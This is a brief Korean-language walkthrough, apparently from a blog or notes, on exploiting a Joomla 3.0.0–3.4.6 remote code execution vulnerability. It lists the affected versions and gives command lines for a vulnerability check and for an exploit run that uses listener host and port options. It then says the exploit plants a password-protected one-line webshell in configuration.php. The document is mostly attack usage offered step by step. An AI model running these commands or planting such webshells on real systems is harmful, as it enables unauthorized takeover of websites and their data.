
영향 범위: 3.0.0-3.4.6
영향 범위: 3.0.0-3.4.6
python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4
“Vulnerable”이 표시되면 취약점이 존재함을 증명합니다.
python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
실행 성공
그리고 “configuration.php”에 무작위 비밀번호로 된 한 줄 웹쉘을 작성합니다.